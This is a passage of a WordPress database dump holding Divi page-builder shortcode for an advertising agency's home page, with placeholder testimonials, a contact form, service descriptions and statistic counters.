quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 16:42:49','2020-08-07 16:42:49','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(505,1,'2020-08-07 16:50:14','2020-08-07 16:50:14','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"creative advertising agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" 